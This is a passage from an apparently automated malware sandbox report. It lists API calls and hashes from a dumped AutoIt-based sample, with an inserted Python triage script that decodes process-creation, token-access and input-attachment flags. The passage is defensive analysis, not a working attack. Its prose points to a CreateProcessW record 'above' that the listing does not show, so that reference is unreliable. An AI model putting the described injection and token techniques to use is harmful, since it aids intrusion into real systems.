                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 48991266-0
                                                                                                          • Opcode ID: 0484744126d09977a8e2318bb8d761b8b25693294b7b5ba3ef93ef4dd0d27ebf
                                                                                                          • Instruction ID: 91640a99a14fede6f43275047a1cd29d3f2192f661412af74ae32889034b7afb
                                                                                                          • Opcode Fuzzy Hash: 0484744126d09977a8e2318bb8d761b8b25693294b7b5ba3ef93ef4dd0d27ebf
                                                                                                          • Instruction Fuzzy Hash: F7F05436101100AFCF416F55EC89B4AFB69EF49360F08C051FE086E22BC731A915DBB4
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E416CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E41729
                                                                                                            • Part of subcall function 00E416CF: SelectObject.GDI32(?,00000000), ref: 00E41738
                                                                                                            • Part of subcall function 00E416CF: BeginPath.GDI32(?), ref: 00E4174F
                                                                                                            • Part of subcall function 00E416CF: SelectObject.GDI32(?,00000000), ref: 00E41778
                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00ECC3E8
                                                                                                          • LineTo.GDI32(00000000,?,?), ref: 00ECC3F5
                                                                                                          • EndPath.GDI32(00000000), ref: 00ECC405
                                                                                                          • StrokePath.GDI32(00000000), ref: 00ECC413
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 1539411459-0
                                                                                                          • Opcode ID: f839602c386701ec23f7d769bfa2f5023740d16f57fd883b534021fe2ebde18b
                                                                                                          • Instruction ID: e57d1430cd50c7c5c029057ebf95b001474414c6f31b98b47d62a37429f4cf0e
                                                                                                          • Opcode Fuzzy Hash: f839602c386701ec23f7d769bfa2f5023740d16f57fd883b534021fe2ebde18b
                                                                                                          • Instruction Fuzzy Hash: B4F0BE32006219BADB122F51AC0DFCE3F99FF05310F188045FA55310E183756555DBA9
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E9AA6F
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9AA82
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00E9AA89
                                                                                                          • AttachThreadInput.USER32(00000000), ref: 00E9AA90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2710830443-0
                                                                                                          • Opcode ID: f31934eeef00399633ea9151c3ec4853dc4b4a27784327b1dbff98b0e771bcdf
                                                                                                          • Instruction ID: c12959e9933dfe74c3fa888794db6e495516d53bbc1db62dd0c13596d740ecb1
                                                                                                          • Opcode Fuzzy Hash: f31934eeef00399633ea9151c3ec4853dc4b4a27784327b1dbff98b0e771bcdf
                                                                                                          • Instruction Fuzzy Hash: 7CE03971542228BBDB215FA2AD0CFEB3F1CEF527A1F488022F519A4450C6B1C554CBE0
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000008), ref: 00E4260D
                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 00E42617
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00E4262C
                                                                                                          • GetStockObject.GDI32(00000005), ref: 00E42634
                                                                                                          • GetWindowDC.USER32(?,00000000), ref: 00E7C1C4
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E7C1D1
                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00E7C1EA
                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00E7C203
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00E7C223
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00E7C22E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1946975507-0
                                                                                                          • Opcode ID: 38a48220410433067f4b297c580ac9658ef088edbe3159d9b995bd17774c1cdd
                                                                                                          • Instruction ID: 47c8bd5c8157bc5544634dcecf8561d551270a910519f77399abef5841da7869
                                                                                                          • Opcode Fuzzy Hash: 38a48220410433067f4b297c580ac9658ef088edbe3159d9b995bd17774c1cdd
                                                                                                          • Instruction Fuzzy Hash: 91E06531506244BFDB215FB5BC097D83B15EB05335F1883ABFA69680E187714984DB11
                                                                                                          APIs
                                                                                                          • GetCurrentThread.KERNEL32 ref: 00E99339
                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E98F04), ref: 00E99340
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E98F04), ref: 00E9934D
                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E98F04), ref: 00E99354
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3974789173-0
                                                                                                          • Opcode ID: a6fb6d5398e91b6281523021bd6a5685be746c10f4215e920748224aa22f8989
                                                                                                          • Instruction ID: 8e5bb56edb775843ac81ac474f5802c9050fb3533b772f0110180bc772b95e8c
                                                                                                          • Opcode Fuzzy Hash: a6fb6d5398e91b6281523021bd6a5685be746c10f4215e920748224aa22f8989
                                                                                                          • Instruction Fuzzy Hash: 29E08632603211BFDB205FF67D0EB563B6CEF50795F184C19B245E9091E6349448C750
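The three records above for CreateProcessW (ref 00ECBCF4), SendMessageTimeoutW/AttachThreadInput (ref 00E9AA6F) and OpenThreadToken/OpenProcessToken (ref 00E99339) are the ones an analyst reads first in a listing like this, and reading them by hand means decoding the literal arguments. The script below is an added example, not Joe Sandbox code and not code from the analysed sample: it parses records in exactly the page's "• Func.MODULE(args), ref: ADDR" layout, decodes the documented Win32 masks, and prints findings. SAMPLE is copied from those three records; every other name in it is this example's own. One assumption is spelled out in the code: the IDA plugin recovers arguments from stack slots, so the 00000028 it shows on the zero-argument GetCurrentProcess is taken to be the DesiredAccess pushed for the OpenProcessToken call that follows. That is an inference from x86 stdcall argument order, not something the report states.

```python
"""Triage helper for the per-function "APIs" records of a Joe Sandbox
disassembly listing. Added example; not Joe Sandbox code and not code from
the analysed sample. SAMPLE is copied from this page, all other names are
this example's own."""
import re
from dataclasses import dataclass

# Constructed input: three records in the page's layout. A record starts at
# an "APIs" line and ends at its "Memory Dump Source" line.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 00ECBCB6
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F08F20,00F08F64), ref: 00ECBCF4
• CloseHandle.KERNEL32 ref: 00ECBD06
Memory Dump Source
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E9AA6F
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9AA82
• GetCurrentThreadId.KERNEL32 ref: 00E9AA89
• AttachThreadInput.USER32(00000000), ref: 00E9AA90
Memory Dump Source
APIs
• GetCurrentThread.KERNEL32 ref: 00E99339
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00E98F04), ref: 00E99340
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E98F04), ref: 00E9934D
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00E98F04), ref: 00E99354
Memory Dump Source
"""

CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Documented Win32 constants (winnt.h / winbase.h / winuser.h).
TOKEN_ACCESS = {0x1: "TOKEN_ASSIGN_PRIMARY", 0x2: "TOKEN_DUPLICATE",
                0x4: "TOKEN_IMPERSONATE", 0x8: "TOKEN_QUERY",
                0x10: "TOKEN_QUERY_SOURCE", 0x20: "TOKEN_ADJUST_PRIVILEGES",
                0x40: "TOKEN_ADJUST_GROUPS", 0x80: "TOKEN_ADJUST_DEFAULT"}
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS",
                  0x10: "CREATE_NEW_CONSOLE", 0x20: "NORMAL_PRIORITY_CLASS",
                  0x200: "CREATE_NEW_PROCESS_GROUP", 0x08000000: "CREATE_NO_WINDOW"}
SMTO_ABORTIFHUNG = 0x2


@dataclass
class Call:
    name: str
    module: str
    args: list   # ints for literals, None where the listing shows '?'
    ref: int


def parse_records(text):
    """Group call lines into records (lists of Call), one per function."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            current = []
            records.append(current)
        elif line == "Memory Dump Source":
            current = None
        elif current is not None and (m := CALL_RE.match(line)):
            raw = m.group("args")
            args = [None if a.strip() == "?" else int(a, 16)
                    for a in raw.split(",")] if raw else []
            current.append(Call(m.group("name"), m.group("module"),
                                args, int(m.group("ref"), 16)))
    return records


def decode_mask(mask, table):
    return [name for bit, name in sorted(table.items()) if mask & bit]


def pending_token_access(record):
    """DesiredAccess that OpenProcessToken receives, or None.

    Assumption, not a statement of the report: the plugin recovers arguments
    from stack slots, so a literal shown on the zero-argument GetCurrentProcess
    is the value pushed for the OpenProcessToken call that follows (stdcall
    pushes DesiredAccess before the handle returned by GetCurrentProcess)."""
    names = [c.name for c in record]
    for i, c in enumerate(record):
        if (c.name == "GetCurrentProcess" and c.args and c.args[0] is not None
                and "OpenProcessToken" in names[i + 1:]):
            return c.args[0]
    return None


def triage(record):
    """Return human-readable findings for one function record."""
    findings, names = [], {c.name for c in record}
    for c in record:
        if c.name == "CreateProcessW" and len(c.args) > 5 and c.args[5] is not None:
            flags = decode_mask(c.args[5], CREATION_FLAGS)
            findings.append(f"CreateProcessW dwCreationFlags=0x{c.args[5]:x} {flags}")
            if "CREATE_SUSPENDED" in flags:
                findings.append("suspended child: candidate for hollowing/injection")
        if (c.name == "SendMessageTimeoutW" and len(c.args) > 5
                and None not in c.args[1:6] and c.args[1] == 0
                and c.args[4] & SMTO_ABORTIFHUNG):
            findings.append(f"hung-window probe: WM_NULL, SMTO_ABORTIFHUNG, {c.args[5]} ms")
    mask = pending_token_access(record)
    if mask is not None:
        findings.append(f"OpenProcessToken DesiredAccess=0x{mask:x} {decode_mask(mask, TOKEN_ACCESS)}")
    if {"AttachThreadInput", "GetWindowThreadProcessId"} <= names:
        findings.append("attaches to another window's input queue (focus forcing)")
    return findings


if __name__ == "__main__":
    for n, rec in enumerate(parse_records(SAMPLE), 1):
        print(f"record {n} @ {rec[0].ref:08X}:", *triage(rec), sep="\n  ")
```

Two things the decoded values tell you that the raw listing does not. The CreateProcessW at 00ECBCF4 passes dwCreationFlags = 0x20, which is only NORMAL_PRIORITY_CLASS; CREATE_SUSPENDED is absent, so this function is not by itself the suspended-child stub that the report's "Injects a PE file into a foreign processes" signature implies, and that behaviour has to be looked for elsewhere. The token function asks for TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES on its own process token, the access pair a caller needs before adjusting a privilege with AdjustTokenPrivileges; the listing shows no such call in this record, so treat it as a privilege check or preparation rather than a confirmed privilege change. The SendMessageTimeoutW record sends WM_NULL with SMTO_ABORTIFHUNG and a 5000 ms timeout, a standard "is this window responsive" probe, before attaching its input queue to the target window's thread.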
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00E80679
                                                                                                          • GetDC.USER32(00000000), ref: 00E80683
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E806A3
                                                                                                          • ReleaseDC.USER32(?), ref: 00E806C4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: 70e11ff160ade4df469c51f209128cc3ca1e85f8b71851748662e6d360e891ee
                                                                                                          • Instruction ID: adc84060f864476246cdd88ab9d044ba2b1c7ef9138bde7444ad1609451d4911
                                                                                                          • Opcode Fuzzy Hash: 70e11ff160ade4df469c51f209128cc3ca1e85f8b71851748662e6d360e891ee
                                                                                                          • Instruction Fuzzy Hash: 74E01AB1801204EFCB419F71E908B9D7FF1EB8C310F159406F86AB7A50DB3885559F50
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00E8068D
                                                                                                          • GetDC.USER32(00000000), ref: 00E80697
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E806A3
                                                                                                          • ReleaseDC.USER32(?), ref: 00E806C4
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
  • Part of subcall function 00E5436A: _wcscpy.LIBCMT ref: 00E5438D
  • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
  • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
• __wcsnicmp.LIBCMT ref: 00EAB670
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EAB739
Strings
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
APIs
Strings
Similarity
• API ID: _memmove
• String ID: #V
• API String ID: 4104443479-3658881132
APIs
• Sleep.KERNEL32(00000000), ref: 00E4E01E
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00E4E037
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EC8186
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC819B
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• _memset.LIBCMT ref: 00EB2C6A
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EB2CA0
Strings
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00EC713C
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EC7178
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• _memset.LIBCMT ref: 00EA30B8
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EA30F3
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• __snwprintf.LIBCMT ref: 00EB4132
  • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
Strings
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EC6D86
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC6D91
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 2bce93d82951d03a1af507c8e76a0651bf524537b878ff871060e9058d2ce775
• Instruction ID: d33e9e639e5e39c1a95c6f50fa682dd38e0e22af4e6826140e00de6bbe995419
• Opcode Fuzzy Hash: 2bce93d82951d03a1af507c8e76a0651bf524537b878ff871060e9058d2ce775
• Instruction Fuzzy Hash: C811B671310208AFEF11AE54DD81FFB3B6AEB84368F115129F915AB291D6329C529760
APIs
  • Part of subcall function 00E42111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E4214F
  • Part of subcall function 00E42111: GetStockObject.GDI32(00000011), ref: 00E42163
  • Part of subcall function 00E42111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4216D
• GetWindowRect.USER32(00000000,?), ref: 00EC7296
• GetSysColor.USER32(00000012), ref: 00EC72B0
Strings
Memory Dump Source: same dump as above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 6757ca4ef7d284c32c0c8071fed02162589810692b43525461b07d68f4f3ff83
• Instruction ID: c47f8d3535f729ce6d1c68f7699f42b674d5de3f21189351940afe8117bab064
• Opcode Fuzzy Hash: 6757ca4ef7d284c32c0c8071fed02162589810692b43525461b07d68f4f3ff83
• Instruction Fuzzy Hash: 4021677261020AAFDB04DFB8DD46EFA7BA8EB08304F005519FD95E3250D635E8519B50
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00EC6FC7
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EC6FD6
Strings
Memory Dump Source: same dump as above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 7f6164a2b4543924296d6201284653cb51f4ad493e142ed13d87ababb1a1e89a
• Instruction ID: cf11536f6ef1d206739d309060f344e10a8390c0b06a8da0abcb013e6cd1d4ad
• Opcode Fuzzy Hash: 7f6164a2b4543924296d6201284653cb51f4ad493e142ed13d87ababb1a1e89a
• Instruction Fuzzy Hash: 28116071600248AFEB105E64BD40FEB3BA9EB05368F10571CF964A71D0C776DC529760
APIs
• _memset.LIBCMT ref: 00EA31C9
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EA31E8
Strings
Memory Dump Source: same dump as above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 8d50632c229c8b12999f9061b32fbffe7c43f42cd7d9515c78794a868cb61ac6
• Instruction ID: 02831fd991300f4447bf4197641e9db28a0240f13c1b2a4209be9da0daec841a
• Opcode Fuzzy Hash: 8d50632c229c8b12999f9061b32fbffe7c43f42cd7d9515c78794a868cb61ac6
• Instruction Fuzzy Hash: 1F11D335D02218ABDB20EAA8DC45B9D77F8AB1F314F145162F805BB2A0D774BF05DB91
APIs
• DeleteObject.GDI32(?), ref: 00E4351D
• DestroyWindow.USER32(?,?,00E54E61), ref: 00E43576
Strings
Memory Dump Source: same dump as above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: DeleteDestroyObjectWindow
• String ID: h
• API String ID: 2587070983-1717268160
• Opcode ID: c57ae1d696ee1c6d7e9fe9e4546ae37c7defe5808a01b3a1573e6c6ee8668640
• Instruction ID: 79cada1a4e639ecc621f8a01706c3e01105b77014ed507d72c9510a446c93aee
• Opcode Fuzzy Hash: c57ae1d696ee1c6d7e9fe9e4546ae37c7defe5808a01b3a1573e6c6ee8668640
• Instruction Fuzzy Hash: 40210070A093048FCB18FB29F95866533E1BB44315B25A199E406A72A5C724FE44EF51
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EB28F8
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EB2921
Strings
Memory Dump Source: same dump as above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 36def104d3605a81b859902591414ddeacf77b8522eebb0f32c06c6270b75435
• Instruction ID: 97b53ce5b938d1b8b3b5910cc1fadf9ccb81b7b0767006ea00760992982108d7
• Opcode Fuzzy Hash: 36def104d3605a81b859902591414ddeacf77b8522eebb0f32c06c6270b75435
• Instruction Fuzzy Hash: 03119E70501226BAEB298B51CC89EFBFBA8EF05755F10952EF6496A100E3706894DAE0
APIs
Strings
Memory Dump Source: same dump as above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _wcscmp
• String ID: 0.0.0.0$L,
• API String ID: 856254489-1974781669
• Opcode ID: 6becb95e40c85e09832695c522bc0a0a866d351aa61560cc5fb4700d19d260fd
• Instruction ID: 681bff6dbf8b3663532718074974cedc6b102017b0eee65afb4b2f2d8be51413
• Opcode Fuzzy Hash: 6becb95e40c85e09832695c522bc0a0a866d351aa61560cc5fb4700d19d260fd
• Instruction Fuzzy Hash: 6E11BF757042049FCB04EE24D881EAAB3F9AF99714F109049EA0A7F3A1CA30FD46CB60
APIs
  • Part of subcall function 00EB86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EB849D,?,00000000,?,?), ref: 00EB86F7
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EB84A0
• htons.WSOCK32(00000000,?,00000000), ref: 00EB84DD
Strings
Memory Dump Source: same dump as above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 2496851823-2422070025
• Opcode ID: 52ecca2b41143974fa0b8b6cca4aeb52494e4f78747b05c8eea300be3e6c2791
• Instruction ID: 663e9f9385b34fff3ec99b8044a2f5249cfba7dc3f2c2cb4baefbe1a1232e4c3
• Opcode Fuzzy Hash: 52ecca2b41143974fa0b8b6cca4aeb52494e4f78747b05c8eea300be3e6c2791
• Instruction Fuzzy Hash: 6811C23020020AABCB10AF64D942FEFB368EF00314F10561AEA25773C1DB71A804CA95
APIs
  • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
  • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E99A2B
Strings
Memory Dump Source: same dump as above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 356fc292afde6666e86906fb576894a66c013b4d3b2ffcc468ba2901fd189fea
• Instruction ID: 356fa5caec31ca158fe7e6f75e14c1ebbc9765efcd16201a9a0ba18c6ca5fbd4
• Opcode Fuzzy Hash: 356fc292afde6666e86906fb576894a66c013b4d3b2ffcc468ba2901fd189fea
• Instruction Fuzzy Hash: 8001F5B1A42218AB8F14EBA8CC52DFEB3A9EF52320B141B19FC75772C2DA31580CC650
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
